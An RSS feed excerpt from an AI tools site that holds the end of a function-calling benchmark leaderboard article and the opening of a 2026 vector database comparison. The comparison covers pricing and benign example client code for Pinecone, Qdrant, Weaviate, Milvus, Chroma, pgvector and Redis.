<p>FinTrace, published April 2026 (<a href="https://arxiv.org/abs/2604.10015">arXiv:2604.10015</a>), evaluated 13 LLMs across 800 annotated financial task trajectories. The rubric grades nine metrics along four axes - action correctness, execution efficiency, process quality, and output quality.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>FinTrace Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Claude Opus 4.6</td>
          <td>Anthropic</td>
          <td>0.788</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Claude Sonnet 4.6</td>
          <td>Anthropic</td>
          <td>0.750</td>
      </tr>
      <tr>
          <td>3</td>
          <td>GPT-5.4</td>
          <td>OpenAI</td>
          <td>0.737</td>
      </tr>
      <tr>
          <td>Mid-tier</td>
          <td>Gemini 3 Flash</td>
          <td>Google</td>
          <td>~0.450</td>
      </tr>
  </tbody>
</table>
<p>The FinTrace authors found that frontier models handle tool selection reliably but consistently struggle with information use and final answer quality. Picking the right function to call isn't the hard part anymore - doing something useful with the result is. That finding holds across all 13 models tested, including the top scorers.</p>
<hr>
<h2 id="scale-labs-enterprise-tool-use">Scale Labs Enterprise Tool Use</h2>
<p>For a broader single-turn tool use perspective, Scale Labs runs an enterprise evaluation against 35 models. Top performers as of the most recent snapshot at <a href="https://labs.scale.com/leaderboard/tool_use_enterprise">labs.scale.com/leaderboard/tool_use_enterprise</a>:</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>o1 (Dec 2024)</td>
          <td>OpenAI</td>
          <td>70.1 ±5.3</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Gemini 2.5 Pro Experimental</td>
          <td>Google</td>
          <td>68.8 ±5.4</td>
      </tr>
      <tr>
          <td>3</td>
          <td>o1 Pro</td>
          <td>OpenAI</td>
          <td>67.0 ±5.4</td>
      </tr>
      <tr>
          <td>4</td>
          <td>o1-preview</td>
          <td>OpenAI</td>
          <td>66.4 ±5.5</td>
      </tr>
      <tr>
          <td>5</td>
          <td>DeepSeek-R1</td>
          <td>DeepSeek</td>
          <td>65.3 ±5.5</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Claude 3.7 Sonnet Thinking</td>
          <td>Anthropic</td>
          <td>65.3 ±5.5</td>
      </tr>
      <tr>
          <td>7</td>
          <td>GPT-4o (May 2024)</td>
          <td>OpenAI</td>
          <td>64.6 ±5.5</td>
      </tr>
      <tr>
          <td>8</td>
          <td>GPT-4.5 Preview</td>
          <td>OpenAI</td>
          <td>63.8 ±5.6</td>
      </tr>
      <tr>
          <td>9</td>
          <td>GPT-4o mini</td>
          <td>OpenAI</td>
          <td>51.7 ±5.8</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Llama 3.1 405B Instruct</td>
          <td>Meta</td>
          <td>50.4 ±5.8</td>
      </tr>
  </tbody>
</table>
<p>This leaderboard uses older model checkpoints (the most recent version evaluated is from early 2025), so it doesn't reflect current frontier capability. It's still useful as a reference for enterprise buyers comparing older deployments and for seeing how reasoning models (o1, o1 Pro) compare to standard models on structured API tasks.</p>
<hr>
<h2 id="key-takeaways">Key Takeaways</h2>
<h3 id="the-bfcl-tau-bench-split-tells-the-real-story">The BFCL-tau-bench split tells the real story</h3>
<p>The biggest insight from these numbers is that BFCL and tau-bench don't agree on model ranking - and they shouldn't, because they're testing different things. BFCL rewards single-call precision; tau-bench rewards sustained reliability across a multi-turn conversation. Claude Opus 4 scores 25.3% on BFCL and 0.814 on tau-bench retail. That isn't a contradiction - it means Claude handles multi-turn tool orchestration well but formats outputs in ways that trip up BFCL's AST parser.</p>
<p>For most production use cases, tau-bench scores matter more. Real agents don't make a single tool call and stop.</p>
<h3 id="open-weight-models-are-competitive-on-structured-calling">Open-weight models are competitive on structured calling</h3>
<p>GLM-4.5 tops BFCL v3 at 76.7%, and Qwen3 32B is right behind at 75.7%. Both are available open-weight. Anthropic's closed models dominate tau-bench, but for applications that need raw function-call accuracy without the conversational overhead, the open-weight options are genuinely strong. Our <a href="/guides/how-to-run-open-source-llm-locally/">guide to running open-source LLMs locally</a> covers setup if you want to benchmark these yourself.</p>
<h3 id="the-thinking-premium-is-marginal-for-tool-calling">The &quot;thinking&quot; premium is marginal for tool calling</h3>
<p>Several model pairs in the BFCL v3 table show identical scores for the base and &quot;Thinking&quot; variant (GLM-4.7-Flash and GLM-4.7-Flash Thinking both score 74.6%; Kimi K2.5 and Kimi K2.5 Thinking both score 64.5%). Extended chain-of-thought doesn't help on well-formed single-call evaluations. It helps on complex multi-step planning - which is what tau-bench and FinTrace measure. So the decision of whether to use a reasoning model should depend on your task structure, not just the model tier.</p>
<h3 id="fintrace-exposes-the-output-problem">FinTrace exposes the output problem</h3>
<p>The FinTrace finding - that all models struggle with information utilization more than tool selection - points to the next frontier in function calling research. Models have gotten good at choosing the right tool. They haven't gotten comparably good at reasoning over the result before taking the next step. This matters enormously for financial, medical, and legal agent workflows where a tool returns a document and the agent needs to extract the right number from it before continuing.</p>
<hr>
<h2 id="practical-guidance">Practical Guidance</h2>
<p><strong>Building a customer service or task automation agent:</strong> Use Claude Sonnet 4.5 or Claude Opus 4. Both consistently lead tau-bench across domains, and the multi-turn reliability gap between them and GPT-4.1 is large enough to matter in production. See our review of <a href="/models/claude-opus-4-6/">Claude Opus 4.6</a> for a deeper look at Anthropic's flagship line.</p>
<p><strong>Structured data extraction or API integration with exact schema requirements:</strong> Check the BFCL v3 table and prioritize GLM-4.5 or Qwen3 32B if output format compliance is your bottleneck. If you're limited to closed APIs, Amazon's Nova Pro 1.0 (67.9% on BFCL v3) sits well above GPT-4.1 on structured calling.</p>
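<p>If schema compliance is the failure mode you're fighting, it helps to make the schema itself strict. Below is a minimal sketch using the OpenAI-compatible <code>tools</code> format that most of these APIs and serving stacks accept; the function name, fields, and model string are hypothetical placeholders, not a recommendation.</p>
<pre><code class="language-python">from openai import OpenAI

client = OpenAI()  # any OpenAI-compatible endpoint behaves the same way

# A tight JSON schema for the arguments; the stricter the schema, the easier it
# is to catch malformed calls before they hit your backend. All names here are
# hypothetical placeholders.
tools = [{
    "type": "function",
    "function": {
        "name": "get_order_status",
        "description": "Look up the status of a customer order.",
        "parameters": {
            "type": "object",
            "properties": {
                "order_id": {"type": "string"},
                "include_items": {"type": "boolean"},
            },
            "required": ["order_id"],
            "additionalProperties": False,
        },
    },
}]

resp = client.chat.completions.create(
    model="gpt-4.1",  # placeholder - swap in whichever model you are evaluating
    messages=[{"role": "user", "content": "Where is order A-1042?"}],
    tools=tools,
    tool_choice="auto",
)
print(resp.choices[0].message.tool_calls)
</code></pre>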
<p><strong>Multi-hop tool chains (MCP, complex pipelines):</strong> MCP-Bench data is limited, but its findings indicate that cross-tool coordination and parameter precision are still hard problems regardless of model tier. Our <a href="/guides/what-is-mcp/">guide on what MCP is and how to use it</a> covers the protocol layer if you're designing the tool interface rather than just selecting a model.</p>
<p><strong>Financial or high-stakes domain tool use:</strong> FinTrace scores put Claude Opus 4.6 (0.788) and Claude Sonnet 4.6 (0.750) ahead of GPT-5.4 (0.737). The gap isn't large, and the benchmark itself is new enough that you should treat these numbers as signals rather than verdicts. Fine-tune on domain-specific tool trajectories if stakes are high - FinTrace-Training (8,196 annotated trajectories) is public.</p>
<hr>
<h2 id="methodology-notes-and-caveats">Methodology Notes and Caveats</h2>
<p>A few things to keep in mind when interpreting these tables:</p>
<p>BFCL v3 evaluates models as of the snapshot date and doesn't account for system prompt changes, context windows, or whether the model is being called with tool-use instructions or not. Provider settings matter.</p>
<p>Tau-bench is stochastic - it uses an LLM to simulate the user, and scores vary across runs. The Pass@k metric helps, but single published numbers should carry error bars that most leaderboard aggregators don't show. The tau-bench airline and retail numbers above come from llm-stats.com's snapshot and may not match Sierra Research's official site for newer models.</p>
<p>FinTrace and MCP-Bench are 2025-2026 publications with limited model coverage. They're worth watching as evaluation harnesses, but neither yet has the breadth of BFCL.</p>
<p>The Scale Labs enterprise leaderboard has excellent methodology documentation but runs on older model versions. Don't use it to compare GPT-5 vs. Claude 4.x.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-model-is-best-for-function-calling-overall">Which model is best for function calling overall?</h3>
<p>No single model leads every benchmark. For multi-turn tool use, Claude Sonnet 4.5. For single-call format precision, GLM 4.5. For financial workflows, Claude Opus 4.6.</p>
<h3 id="why-does-claude-score-so-low-on-bfcl-but-high-on-tau-bench">Why does Claude score so low on BFCL but high on tau-bench?</h3>
<p>BFCL uses AST parsing to check output format. Claude wraps responses conversationally, which fails the parser even when tool selection is correct. Tau-bench measures task completion, where Claude's reasoning over outputs is an advantage.</p>
<h3 id="are-open-weight-models-competitive-with-closed-apis-for-tool-use">Are open-weight models competitive with closed APIs for tool use?</h3>
<p>On BFCL v3, yes - GLM 4.5 and Qwen3 32B beat every closed API in the table. On tau-bench multi-turn tasks, Anthropic closed models hold a consistent lead, though GLM-4.5 runs competitively at rank 3-4.</p>
<h3 id="how-often-do-these-rankings-change">How often do these rankings change?</h3>
<p>BFCL updates with new model submissions irregularly - major frontier releases tend to appear within weeks of launch. Tau-bench and FinTrace are less frequently updated. Check the source leaderboards linked in the Sources section for the latest snapshots.</p>
<h3 id="whats-the-difference-between-tau-bench-and-tau2-bench">What's the difference between tau-bench and tau2-bench?</h3>
<p>The original tau-bench covers airline and retail customer service. Tau2-bench adds a telecom domain with more complex policy constraints. Scores aren't comparable across domains.</p>
<h3 id="does-function-calling-performance-transfer-to-mcp-tool-use">Does function calling performance transfer to MCP tool use?</h3>
<p>Partially. BFCL and tau-bench measure direct function calls in controlled setups. MCP-Bench adds tool discovery and cross-server coordination. Models that score well on BFCL don't automatically handle MCP workflows well, according to the Accenture paper's findings.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://gorilla.cs.berkeley.edu/leaderboard.html">Berkeley Function Calling Leaderboard (BFCL) V4</a></li>
<li><a href="https://pricepertoken.com/leaderboards/benchmark/bfcl-v3">BFCL v3 model rankings - pricepertoken.com</a></li>
<li><a href="https://llm-stats.com/benchmarks/bfcl">BFCL benchmark - llm-stats.com</a></li>
<li><a href="https://github.com/sierra-research/tau-bench">tau-bench GitHub repository</a></li>
<li><a href="https://llm-stats.com/benchmarks/tau-bench-airline">tau-bench airline - llm-stats.com</a></li>
<li><a href="https://llm-stats.com/benchmarks/tau-bench-retail">tau-bench retail - llm-stats.com</a></li>
<li><a href="https://benchlm.ai/benchmarks/tauBench">BenchLM tau-bench snapshot</a></li>
<li><a href="https://artificialanalysis.ai/evaluations/tau2-bench">tau2-bench telecom leaderboard - Artificial Analysis</a></li>
<li><a href="https://arxiv.org/abs/2604.10015">FinTrace: Holistic Trajectory-Level Evaluation of LLM Tool Calling (arXiv:2604.10015)</a></li>
<li><a href="https://arxiv.org/abs/2508.20453">MCP-Bench: Benchmarking Tool-Using LLM Agents (arXiv:2508.20453)</a></li>
<li><a href="https://github.com/OpenBMB/ToolBench">ToolBench - OpenBMB GitHub</a></li>
<li><a href="https://labs.scale.com/leaderboard/tool_use_enterprise">Scale Labs Enterprise Tool Use Leaderboard</a></li>
<li><a href="https://llm-stats.com/leaderboards/best-ai-for-tool-calling">Best AI for Tool Calling - llm-stats.com</a></li>
<li><a href="https://benchlm.ai/llm-agent-benchmarks">BenchLM LLM Agent and Tool-Use Benchmarks</a></li>
<li><a href="https://huggingface.co/spaces/Nexusflow/Nexus_Function_Calling_Leaderboard">Nexus Function Calling Leaderboard - Hugging Face</a></li>
<li><a href="https://arxiv.org/abs/2604.13519">ToolSpec: Accelerating Tool Calling (arXiv:2604.13519)</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Leaderboards</category><media:content url="https://awesomeagents.ai/images/leaderboards/function-calling-benchmarks-leaderboard_hu_d7545c1eca026844.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/leaderboards/function-calling-benchmarks-leaderboard_hu_d7545c1eca026844.jpg" width="1200" height="675"/></item><item><title>Best AI Vector Databases 2026 - Full Comparison</title><link>https://awesomeagents.ai/tools/best-ai-vector-databases-2026/</link><pubDate>Fri, 17 Apr 2026 14:05:48 +0200</pubDate><guid>https://awesomeagents.ai/tools/best-ai-vector-databases-2026/</guid><description><![CDATA[<p>The vector database market has fractured into at least four distinct product categories that happen to share a name. There's the fully managed SaaS layer (Pinecone, Weaviate Cloud, Zilliz Cloud), the self-hosted open-source engines (Qdrant, Milvus, Weaviate OSS), the embedded libraries you ship inside your application (Chroma, LanceDB), and the &quot;just use what you already have&quot; options (pgvector, Redis, OpenSearch, MongoDB Atlas, SingleStore). Each category makes different trade-offs, and picking the wrong one for your workload is an expensive mistake to fix later.</p>]]></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>The vector database market has fractured into at least four distinct product categories that happen to share a name. There's the fully managed SaaS layer (Pinecone, Weaviate Cloud, Zilliz Cloud), the self-hosted open-source engines (Qdrant, Milvus, Weaviate OSS), the embedded libraries you ship inside your application (Chroma, LanceDB), and the &quot;just use what you already have&quot; options (pgvector, Redis, OpenSearch, MongoDB Atlas, SingleStore). Each category makes different trade-offs, and picking the wrong one for your workload is an expensive mistake to fix later.</p>
<p>This article covers all 12 options with verified pricing from official pages checked in April 2026, benchmark data from <a href="https://github.com/zilliztech/VectorDBBench">VectorDBBench</a> and Qdrant's open-source benchmark suite, and honest commentary on where the marketing oversells reality.</p>
<p>If you're looking at the end-to-end retrieval stack - frameworks like LangChain, LlamaIndex, and Haystack that sit on top of these databases - see our <a href="/tools/best-ai-rag-tools-2026/">best RAG tools comparison</a>. For embedding model selection, the <a href="/leaderboards/embedding-model-leaderboard-mteb-march-2026/">MTEB leaderboard coverage</a> has the current rankings. If you're newer to the architecture pattern, <a href="/guides/what-is-rag/">what is RAG</a> covers the fundamentals.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Best fully managed: Pinecone Serverless for small-medium workloads; Weaviate Dedicated or Zilliz Cloud for large scale</li>
<li>Best self-hosted: Qdrant for filtered search performance and Rust-level efficiency; Milvus for billion-scale writes</li>
<li>Best &quot;no new infra&quot;: pgvector if you already run Postgres; Turbopuffer if cost is the primary driver at scale</li>
<li>Hybrid search (BM25 + dense vectors) is now table-stakes - every serious option has it</li>
</ul>
</div>
<h2 id="the-benchmark-reality-check">The Benchmark Reality Check</h2>
<p>Before the individual reviews, some important context on the numbers floating around this space.</p>
<p>Every vendor publishes benchmarks that favor their product. Qdrant's open-source benchmark suite tests only open-source engines, which is at least methodologically consistent. Zilliz's VectorDBBench includes managed cloud services but was built by the Milvus maintainers. Redis's benchmark blog put Redis 3.4x ahead of Qdrant in QPS - at lower recall thresholds where Redis traded accuracy for speed.</p>
<p>The numbers that matter for production RAG workloads are: <strong>p99 latency under concurrent load</strong> and <strong>recall at k=10 with 95%+ threshold</strong>. Single-threaded p50 benchmarks don't tell you what happens when your app has real traffic.</p>
<p>With that caveat: at 1M vectors (768 dimensions), Qdrant's benchmark shows it achieving roughly 1,200 QPS at 99% recall, Milvus indexing faster than most alternatives but showing some degradation at 10M+ vectors in lower dimensions, and Elasticsearch running up to 10x slower at 10M vectors of 96 dimensions compared to purpose-built engines.</p>
<p>Turbopuffer's architecture gives it 10ms p90 warm-cache performance but 444ms p90 cold-cache, which matters if you have a long tail of rarely-queried namespaces.</p>
<hr>
<h2 id="comparison-table">Comparison Table</h2>
<table>
  <thead>
      <tr>
          <th>Database</th>
          <th>Self-Host</th>
          <th>Managed Cloud</th>
          <th>Free Tier</th>
          <th>Hybrid Search</th>
          <th>Starting Price</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Pinecone</td>
          <td>No</td>
          <td>Yes</td>
          <td>Yes (2GB, 2M RU/mo)</td>
          <td>Yes (via sparse)</td>
          <td>$50/mo minimum</td>
      </tr>
      <tr>
          <td>Qdrant</td>
          <td>Yes (free)</td>
          <td>Yes</td>
          <td>Yes (1GB cluster)</td>
          <td>Yes</td>
          <td>$0.014/hr cloud</td>
      </tr>
      <tr>
          <td>Weaviate</td>
          <td>Yes (free)</td>
          <td>Yes</td>
          <td>14-day trial</td>
          <td>Yes (native)</td>
          <td>$45/mo Flex</td>
      </tr>
      <tr>
          <td>Milvus / Zilliz</td>
          <td>Yes (free)</td>
          <td>Zilliz Cloud</td>
          <td>Yes (5GB + 2.5M vCUs)</td>
          <td>Yes</td>
          <td>$99/mo dedicated</td>
      </tr>
      <tr>
          <td>Chroma</td>
          <td>Yes (free)</td>
          <td>No</td>
          <td>Always free</td>
          <td>Limited</td>
          <td>$0 self-hosted</td>
      </tr>
      <tr>
          <td>pgvector</td>
          <td>Yes (free)</td>
          <td>Via cloud Postgres</td>
          <td>Via free Postgres tiers</td>
          <td>Via pg_search</td>
          <td>$0 extension</td>
      </tr>
      <tr>
          <td>Redis Vector</td>
          <td>Yes (free)</td>
          <td>Redis Cloud</td>
          <td>Yes (30MB)</td>
          <td>Yes (FT.HYBRID)</td>
          <td>~$5/mo Essentials</td>
      </tr>
      <tr>
          <td>LanceDB</td>
          <td>Yes (free)</td>
          <td>Beta (usage-based)</td>
          <td>$100 credits</td>
          <td>Yes</td>
          <td>$0 self-hosted</td>
      </tr>
      <tr>
          <td>Turbopuffer</td>
          <td>No</td>
          <td>Yes (serverless)</td>
          <td>No</td>
          <td>Yes</td>
          <td>$64/mo minimum</td>
      </tr>
      <tr>
          <td>Elastic / OpenSearch</td>
          <td>Yes (free)</td>
          <td>Yes</td>
          <td>Limited</td>
          <td>Yes (ELSER)</td>
          <td>Varies by instance</td>
      </tr>
      <tr>
          <td>MongoDB Atlas</td>
          <td>No</td>
          <td>Yes</td>
          <td>Yes (512MB)</td>
          <td>Yes (Atlas Search)</td>
          <td>Flex ~$30/mo cap</td>
      </tr>
      <tr>
          <td>SingleStore</td>
          <td>Yes (limited)</td>
          <td>Yes</td>
          <td>Yes (free tier)</td>
          <td>Yes (native SQL)</td>
          <td>Custom</td>
      </tr>
  </tbody>
</table>
<p><img src="/images/tools/best-ai-vector-databases-2026-benchmark.jpg" alt="Server racks in a data center - the physical infrastructure underlying vector database services">
<em>The storage and compute infrastructure behind managed vector database services runs on the same data center hardware - the real differentiation is in the index structure, query engine, and operational experience above the metal.</em>
<small>Source: unsplash.com</small></p>
<hr>
<h2 id="pinecone---best-for-teams-that-want-zero-ops">Pinecone - Best for Teams That Want Zero Ops</h2>
<p>Pinecone's serverless architecture is still the fastest path from zero to a working vector search endpoint. There's no cluster to configure, no index parameters to tune, and the free Starter tier includes 2GB storage, 2M write units/month, and 1M read units/month with no credit card required.</p>
<p>The Standard plan has a $50/month minimum and charges $0.33/GB/month for storage, $4/million write units, and $16/million read units. Enterprise is $500/month minimum and adds 99.95% uptime SLA, private networking, and HIPAA support.</p>
<h3 id="the-read-unit-cliff">The read unit cliff</h3>
<p>Pinecone's pricing model has a structural problem at scale that their docs don't highlight enough. Read unit consumption is 1 RU per 1GB of namespace queried, with a 0.25 RU minimum per query. That seems fine until your namespace grows. At 50GB of vectors, a single query costs 50 RUs. Run 5M queries/month against that namespace and you're at 250M RUs - which is $4,000/month in read costs alone on Standard. Self-hosting Qdrant on a 16GB RAM node would run $96/month for the same data.</p>
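<p>The arithmetic is worth sanity-checking against your own workload before committing. A back-of-envelope sketch using the Standard-tier rates quoted above:</p>
<pre><code class="language-python"># Back-of-envelope read cost for one large namespace on Pinecone Standard,
# using the rates quoted above (1 RU per GB scanned, $16 per million RUs).
namespace_gb = 50
queries_per_month = 5_000_000
price_per_read_unit = 16 / 1_000_000  # dollars

monthly_read_units = namespace_gb * queries_per_month          # 250,000,000 RUs
monthly_read_cost = monthly_read_units * price_per_read_unit   # $4,000
print(f"{monthly_read_units:,} RUs = ${monthly_read_cost:,.0f}/month in reads")
</code></pre>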
<p>Pinecone's query API is proprietary. Migrating off at scale is painful because there's no standard wire protocol. That's worth pricing into your decision upfront.</p>
<p><strong>Integrations:</strong> LangChain, LlamaIndex, Haystack, Vertex AI, AWS Bedrock - all first-class support.</p>
<hr>
<h2 id="qdrant---best-open-source-performance">Qdrant - Best Open-Source Performance</h2>
<p>Qdrant is written in Rust and built specifically for vector similarity search with complex metadata filtering. The cloud free tier gives you a single-node cluster permanently at no cost. Paid cloud nodes start at $0.014/hour (roughly $10/month for the smallest configuration). A 16GB RAM / 4 vCPU production cluster on AWS via Qdrant Cloud runs roughly $96/month with no per-query billing.</p>
<p>Self-hosting is free under Apache 2.0 with no limits other than your hardware. A three-node production cluster on AWS typically runs $300-500/month depending on instance types.</p>
<h3 id="where-it-actually-leads">Where it actually leads</h3>
<p>Filtered vector search is where Qdrant's engineering shows most clearly. When you combine similarity search with strict metadata conditions - &quot;find the 10 most similar documents where <code>source=legal</code> and <code>date&gt;2025-01-01</code>&quot; - Qdrant's payload filtering engine consistently beats alternatives in Qdrant's own benchmarks (which, again, should be reproduced independently before you bet your architecture on them).</p>
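<p>For a sense of what that looks like in practice, here's a minimal sketch using the Python <code>qdrant-client</code>. The collection name, payload fields, and query vector are placeholders, and it assumes the <code>date</code> field is stored and indexed as a datetime payload.</p>
<pre><code class="language-python">from qdrant_client import QdrantClient, models

client = QdrantClient(url="http://localhost:6333")

# Top-10 nearest neighbours where source=legal and date is after 2025-01-01.
hits = client.search(
    collection_name="documents",
    query_vector=[0.12] * 768,
    query_filter=models.Filter(
        must=[
            models.FieldCondition(key="source", match=models.MatchValue(value="legal")),
            models.FieldCondition(key="date", range=models.DatetimeRange(gt="2025-01-01T00:00:00Z")),
        ]
    ),
    limit=10,
)
for hit in hits:
    print(hit.id, hit.score)
</code></pre>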
<p>The benchmark suite at <a href="https://qdrant.tech/benchmarks/">qdrant.tech/benchmarks</a> shows Qdrant achieving highest RPS and lowest latencies across most tested configurations. Milvus is notably faster at index build time. Redis shows higher raw QPS at lower recall thresholds.</p>
<p><strong>Hybrid search:</strong> Supports dense + sparse vector search natively. BM25 integration via sparse embedding models.</p>
<p><strong>Integrations:</strong> LangChain, LlamaIndex, Haystack, all have maintained connectors.</p>
<hr>
<h2 id="weaviate---best-native-hybrid-search">Weaviate - Best Native Hybrid Search</h2>
<p>Weaviate's main differentiator is that hybrid search (BM25 + dense vectors with score fusion) ships as a first-class query primitive, not a bolted-on feature. You don't need to run a separate text search index and merge results at the application layer. The built-in <code>hybrid</code> query parameter handles it in one call.</p>
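<p>A minimal sketch of that single-call pattern with the v4 Python client - the collection name, query text, and <code>alpha</code> weighting are placeholders you'd tune for your own corpus:</p>
<pre><code class="language-python">import weaviate

# Connects to a local instance; collection name and query text are placeholders.
client = weaviate.connect_to_local()
docs = client.collections.get("Document")

# One call runs BM25 and vector search and fuses the scores;
# alpha=0.5 weights keyword and vector results equally.
results = docs.query.hybrid(
    query="termination clause in employment contracts",
    alpha=0.5,
    limit=10,
)
for obj in results.objects:
    print(obj.properties)

client.close()
</code></pre>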
<p>Cloud pricing shifted in October 2025. The Flex plan starts at $45/month (shared deployment, pay-as-you-go), Plus starts at $400/month (dedicated or shared, prepaid contract). Pricing dimensions now include vector dimensions ($0.00975-$0.01668 per million depending on compression method), storage ($0.2125-$0.31875 per GiB), and backup ($0.022-$0.033 per GiB). For 10M objects at 1,536 dimensions without compression, expect roughly $1,459/month before backup costs.</p>
<p>Compression matters here. Weaviate supports product quantization (PQ) and binary quantization (BQ), which can reduce vector storage by 4-32x at some recall cost. For most RAG workloads where you're trading off a few percentage points of recall for 8x lower storage cost, the math usually works.</p>
<p>Self-hosted Weaviate is free and open-source. Docker Compose deployment is straightforward for development; Kubernetes is the production path.</p>
<h3 id="weaviates-vectorizer-modules">Weaviate's vectorizer modules</h3>
<p>One truly useful feature: Weaviate can call embedding models automatically on data import through its vectorizer module system. You configure which model to use, push raw text, and Weaviate handles the embedding calls. This reduces the application code needed to maintain an embedding pipeline. The trade-off is that it obscures the embedding step and creates a tight coupling between your database and your embedding provider.</p>
<hr>
<h2 id="milvus--zilliz-cloud---best-for-billion-scale">Milvus / Zilliz Cloud - Best for Billion-Scale</h2>
<p>Milvus is the open-source project; Zilliz Cloud is the fully managed version. At the scale where most databases start struggling - 100M+ vectors, high write throughput - Milvus was architecturally designed for it. It separates storage, compute, and indexing into distinct services, which means you can scale each dimension independently.</p>
<p>Zilliz Cloud pricing in early 2026: the free tier includes 5GB storage and 2.5M vCUs monthly. Serverless charges $4 per million vCUs (virtual compute units). Dedicated clusters start at $99/month. In October 2025, Zilliz introduced tiered storage delivering an 87% storage cost reduction and standardized storage pricing at $0.04/GB/month across AWS, Azure, and GCP.</p>
<p>Milvus 2.6.x (now on Zilliz Cloud) introduced cloud-only index optimizations that further reduce TCO for billion-scale deployments.</p>
<h3 id="the-ops-burden">The ops burden</h3>
<p>Running Milvus self-hosted in production is real work. It requires etcd, MinIO (or S3), and multiple Milvus service components. The Helm chart works, but understanding what each component does and how to size it takes time. Zilliz Cloud removes this completely, at cost. For teams without dedicated infrastructure engineers, self-hosting Milvus at production scale is probably the wrong call.</p>
<p><strong>Integrations:</strong> Full support in LangChain, LlamaIndex, and Haystack.</p>
<hr>
<h2 id="chroma---best-for-local-development">Chroma - Best for Local Development</h2>
<p>Chroma is the default vector database for tutorials and early prototyping because the API is genuinely simple and the Python library installs in one command. The 2025 Rust rewrite improved write and query performance significantly over the original Python implementation.</p>
<p>There's no cloud managed offering. Chroma is embedded, in-memory first (with optional disk persistence), and designed for single-node deployments. Self-hosting on a 4GB VPS costs under $30/month and handles millions of embeddings for most development workloads.</p>
<p>The honest assessment: Chroma doesn't belong in production RAG systems handling more than a few million vectors with concurrent traffic. The memory-first architecture hits a wall when data no longer fits in RAM. For anything production at scale, it's a stepping stone to a proper deployment.</p>
<p><strong>Hybrid search:</strong> Basic keyword + vector combination, less capable than purpose-built hybrid search in Qdrant or Weaviate.</p>
<hr>
<h2 id="pgvector---best-if-you-already-run-postgres">pgvector - Best If You Already Run Postgres</h2>
<p>Pgvector extends PostgreSQL with vector storage and approximate nearest-neighbor search via HNSW and IVFFlat indexes. If your application already runs on Postgres, adding vector search costs you nothing in infrastructure. Your documents and embeddings live in the same table, metadata filtering uses standard SQL WHERE clauses, and there's no synchronization pipeline to maintain.</p>
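<p>A quick sketch of what that looks like - table, HNSW index, and a filtered cosine-distance query in plain SQL, driven here from psycopg. Names and dimensions are placeholders; in a real application you'd register the pgvector adapter rather than casting a string.</p>
<pre><code class="language-python">import psycopg  # psycopg 3; `pip install psycopg pgvector` for the adapter

conn = psycopg.connect("postgresql://localhost/mydb")  # placeholder DSN
with conn, conn.cursor() as cur:
    # One-time setup: enable the extension, create a table, build an HNSW index.
    cur.execute("CREATE EXTENSION IF NOT EXISTS vector")
    cur.execute("""
        CREATE TABLE IF NOT EXISTS docs (
            id bigserial PRIMARY KEY,
            source text,
            published date,
            embedding vector(768)
        )""")
    cur.execute(
        "CREATE INDEX IF NOT EXISTS docs_hnsw ON docs "
        "USING hnsw (embedding vector_cosine_ops)"
    )

    # Query: cosine distance (&lt;=&gt;) plus ordinary SQL filtering in one statement.
    # A text cast keeps the sketch short; pgvector's register_vector() is cleaner.
    query_vec = [0.01] * 768
    cur.execute(
        """SELECT id, source FROM docs
           WHERE source = %s AND published &gt; %s
           ORDER BY embedding &lt;=&gt; %s::vector
           LIMIT 10""",
        ("legal", "2025-01-01", str(query_vec)),
    )
    print(cur.fetchall())
</code></pre>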
<p>The marginal cost is effectively zero if you have spare capacity on your existing database. A dedicated Postgres instance for a vector workload runs $30-80/month depending on size. Every managed Postgres provider - Supabase, Neon, RDS, AlloyDB, Azure Database for PostgreSQL - supports pgvector as an extension.</p>
<h3 id="the-limits">The limits</h3>
<p>Pgvector trails purpose-built engines at large vector counts (50M+) and high QPS. It's not designed for billion-scale vector workloads. But most RAG applications don't have billion-scale vector workloads. They have a few million documents, moderate query rates, and a team that already knows how to operate Postgres. For that profile, pgvector is often the correct answer.</p>
<p>The <code>pgvecto.rs</code> extension from TensorChord is worth knowing as an alternative - it's written in Rust and shows better performance at scale than the original C implementation, with the same SQL API.</p>
<p><strong>Hybrid search:</strong> Combine with <code>pg_search</code> (Apache-2.0, by ParadeDB) for BM25 full-text search in the same Postgres instance.</p>
<hr>
<h2 id="redis-vector-search---best-for-low-latency-requirements">Redis Vector Search - Best for Low-Latency Requirements</h2>
<p>Redis 8.4 (released early 2026) introduced <code>FT.HYBRID</code>, a unified command that fuses full-text BM25 and vector similarity results within a single execution plan. Previous versions required merging results at the application layer. This is a genuine improvement for hybrid search use cases.</p>
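<p>For context on what <code>FT.HYBRID</code> collapses into one call, here's a rough sketch of the pre-8.4 approach via redis-py: a pure KNN query against a vector field, with BM25 run separately and the two result sets merged in your own code. Index and field names are placeholders.</p>
<pre><code class="language-python">import array
import redis
from redis.commands.search.query import Query

r = redis.Redis(host="localhost", port=6379)

# A pure KNN query against a pre-built index ("docs_idx") with a VECTOR field
# ("embedding"). The query vector is passed as raw float32 bytes.
query_vec = array.array("f", [0.1] * 768).tobytes()
q = (
    Query("*=&gt;[KNN 10 @embedding $vec AS score]")
    .sort_by("score")
    .return_fields("title", "score")
    .dialect(2)
)
results = r.ft("docs_idx").search(q, query_params={"vec": query_vec})
for doc in results.docs:
    print(doc.title, doc.score)
</code></pre>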
<p>Redis Cloud pricing: a permanent free tier with 30MB (not useful for production), Essentials from $0.007/hour (roughly $5/month), and Pro from $0.014/hour (roughly $200/month minimum). Pro adds dedicated resources, active-active replication, and 99.999% uptime.</p>
